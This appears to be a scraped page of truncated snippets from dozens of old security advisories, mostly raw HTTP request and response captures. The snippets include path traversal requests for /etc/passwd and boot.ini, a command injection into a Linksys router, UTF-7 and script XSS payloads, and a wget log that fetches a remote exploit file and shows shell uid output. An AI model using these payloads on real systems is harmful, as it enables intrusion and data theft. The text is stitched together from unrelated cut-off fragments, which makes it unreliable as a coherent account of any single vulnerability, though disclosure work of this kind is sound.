
400 Bad Request

[ADVISORY] NetCache URL DoS - Argentinian ISP

same behavior would be exhibited by the victim proxy with host names:

// Let's check that our target IP is handled by a NetCache:
$ printf "TRACE / HTTP/1.1\r\nHost: 74.125.65.106\r\nMax-Forwards: 0\r\nConnection: Close\r\n\r\n" | nc 74.125.65.106 80
HTTP/1.1 200 OK
Date: Mon, 17 Aug 2009 00:35:16 GMT
Content-Length: 97
Content-Type: message/http
Server: NetCache appliance (NetApp/6.0.7)
Connection: close

Apache2 Undefined Charset UTF-7 XSS Vulnerability

Content-type: text/html
Keep-Alive: 300
Connection: keep-alive


HTTP/1.1 200 OK
Date: Thu, 09 Aug 2007 01:01:48 GMT
Server: Apache/1.3.29 (Unix) PHP/5.1.6 with Suhosin-Patch mod_ssl/2.8.16 OpenSSL/0.9.7j
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked

Cacti 0.8.7a Multiple Vulnerabilities

> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html

ImageShack Toolbar FileUploader Class insecurities

--B-O-U-N-D-A-R-Y731553141--


reply:

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
X-Powered-By: PHP/5.1.2
Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
Set-Cookie: PHPSESSID=[..]; path=/

Directory traversal flaw in shttp

Connection: close


HEAD /../../var/log/messages HTTP/1.0

HTTP/1.1 200 OK
Content-Length: 178455
Content-Type: text/plain
Last-Modified: Thu, 25 Oct 2007 16:36:39 GMT
Server: Shttp/ServerKit
Date: Thu, 25 Oct 2007 16:42:32 GMT

CubeCart 4 Session Management Bypass

You can save it in a text file and use it with netcat
(http://netcat.sourceforge.net/) like:

>nc bld02 80 < db_dump.txt | more

HTTP/1.1 200 OK
Date: Tue, 20 Oct 2009 09:01:58 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Pragma: private

PR07-44: XSS on RSA Authentication Agent login page

Accept: */*


PARTIAL HTTP RESPONSE (payload is returned after the 'postdata' tag):

HTTP/1.1 200 OK
Connection: close
Expires: 0
Date: Wed, 12 Dec 2007 17:32:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0

[CVE-2007-5301] alsaplayer PoC - exploit

#
# --12:19:27--  http://www.wekk.net/research/CVE-2007-5301/exploit.ogg
#            => `exploit.ogg'
# Resolving www.wekk.net... 64.22.71.90
# Connecting to www.wekk.net|64.22.71.90|:80... connected.
# HTTP request sent, awaiting response... 200 OK
# Length: 5,421 (5.3K) [application/ogg]
# 
# 100%[===============================================================================>] 5,421 
# 12:19:28 (37.00 KB/s) - `exploit.ogg' saved [5421/5421]
# uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)

SAP NetWeaver XSS Vulnerability

only the unfiltered value of the vulnerable parameter. It is possible
to create a URL which causes the resulting page to contain malicious
JavaScript code. A response to such a request could look like the
following example:

HTTP/1.1 200 OK
Date: Fri, 18 Jul 2008 13:13:30 GMT
Server: <server>
content-type: text/plain
Content-Length: 67
Keep-Alive: timeout=10, max=500

eyeOS checksum prediction

1. GET / HTTP/1.1
>>>>>>> <body onload='sendMsg("758474843719")

2. POST /index.php?checknum=758474843719&msg=baseapp HTTP/1.1
>>>>>>> HTTP/1.1 200 OK
        Date: Mon, 27 Aug 2007 18:58:21 GMT
        Server: Apache/2.2.3 (Debian) DAV/2    SVN/1.4.2 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
        Expires: Thu, 19 Nov 1981 08:52:00 GMT
        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        Pragma: no-cache

MSN messenger sends IP addresses Public and Private

MSG 50 D 555
MIME-Version: 1.0
Content-Type: application/x-msnmsgrp2p
P2P-Dest: bbbb@hotmail.it

####^áEu######################ÔùH(############MSNSLP/1.0 200 OK
To: <msnmsgr:bbbbb@hotmail.it>
From: <msnmsgr:aaaa@hotmail.it>
Via: MSNSLP/1.0/TLP ;branch={31DB585D-3119-40AF-B02B-3D9BAEF32CD0}
CSeq: 1
Call-ID: {9A68685A-1FCF-86A1-B639-BA769BA9B514}

OpenNMS Multiple Vulnerabilities

Date: Thu, 25 Sep 2008 11:35:20 GMT
Server: Apache/2.2.3
Location: http://server/opennms/event/list?
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 36

<html><body>BugSec</body></html><!--=
Content-Length: 0

PHP 5.2.4 mail.force_extra_parameters unsecure

We have received a lot of questions about the news item http://securityreason.com/news/0/0x1f, and we will show how to exploit this issue. When using PHP as an Apache module, you can also change the configuration settings using directives in a .htaccess file. But it is possible to bypass safe_mode or open_basedir via mail.force_extra_parameters. A lot of servers run sendmail; it can also be exim, etc. But we show how to exploit this for a famous mail server (SENDMAIL).

For example you can set mail.force_extra_parameters via .htaccess.

cxib# curl -I http://localhost:82
HTTP/1.1 200 OK
Date: Thu, 06 Sep 2007 22:18:35 GMT
Server: Apache/2.2.4 (FreeBSD) mod_ssl/2.2.4 OpenSSL/0.9.7e-p1 DAV/2 PHP/5.2.4
Last-Modified: Sat, 20 Nov 2004 20:16:24 GMT
ETag: "27e4f0-2c-4c23b600"
Accept-Ranges: bytes

Philips VOIP841 Multiple Vulnerabilities

Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl

HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0


Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities

Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-
alert('owned')+ADw-/script+AD4-</body></html>

This will result in:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub

MS OWA 2003 Redirection Vulnerability

Keep-Alive: 300
Connection: keep-alive
Cookie: sessionid=[...]; cadata="[...]"

And we get a redirection to the website defined:
HTTP/1.1 200 OK
Cache-Control: No-cache
Content-Length: 277
Content-Type: text/html
Expires: Fri, 28 Mar 2008 08:53:11 GMT
Server: Microsoft-IIS/6.0

Linksys WAG54G2 Web Management Console Local Arbitrary Shell Command Injection Vulnerability

GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1
Host: 192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4=

HTTP/1.0 200 OK
sh: cannot create 1: Unknown error 30
killall: pingmultilang: no process killed
killall: 2: no process killed
  PID  Uid     VmSize Stat Command
    1 root        284 S   init       

Re: MS OWA 2003 Redirection Vulnerability

> Keep-Alive: 300
> Connection: keep-alive
> Cookie: sessionid=[...]; cadata="[...]"
> 
> And we get a redirection to the website defined:
> HTTP/1.1 200 OK
> Cache-Control: No-cache
> Content-Length: 277
> Content-Type: text/html
> Expires: Fri, 28 Mar 2008 08:53:11 GMT
> Server: Microsoft-IIS/6.0

Opera Stored Cross Site Scripting Vulnerability

src=http://xxx/a.js></script>'>a</a>
</html>

The link includes the cross site scripting injection
and brings the victim to page 2.html. The web server
returns 200 OK. The 2.html source code:

2.HTML

<html>
This is a proof of concept.

[CVE-2009-1479] Boxalino - Directory Traversal Vulnerability

Pragma: no-cache

url=../../../../../../../../boot.ini&login_loginName=example&login_loginPassword=example&login_cmd_logon=Login&defaultAction=Example&login_cmd_logon_resultPage=%2Fboxalino%2Fclient%2Fdesktop%2Fdefault%2Ehtm


HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Tues, 01 Jan 1980 00:00:00 GMT
Content-Type: text/html
Content-Length: 208
Date: Wed, 29 Apr 2009 09:01:06 GMT

FormMail 1.92 Multiple Vulnerabilities

Content-Length: 0
Location:
Transfer-Encoding: chunked
Content-Type: text/plain

HTTP/1.1 200 OK
Content-Type: text/plain
http://www.ush.it

--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<--


RE: Cisco ASA5520 Web VPN Host Header XSS

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1

[AntiSnatchOr] Pentaho Bi-server multiple vulnerabilities

Proxy-Connection: Keep-Alive

When the request is executed, a popup showing the string Pwnd can be seen.
Here is the response:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.1.GA (build: SVNTag=JBoss_4_2_1_GA date=200707131605)/Tomcat-5.5
content-disposition: inline;filename=Customer_Lifetime_Orders.html
Content-Type: text/html;charset=UTF-8

[CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection

Content-Length: 56

Starting, please wait..."><script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive

Cisco ASA5520 Web VPN Host Header XSS

username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=


Response:

HTTP/1.1 200 OK
Server: Virata-EmWeb/R6_2_0
Content-Type: text/html
Cache-Control: max-age=0
Set-Cookie: webvpn=; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/
Set-Cookie: webvpnlogin=1


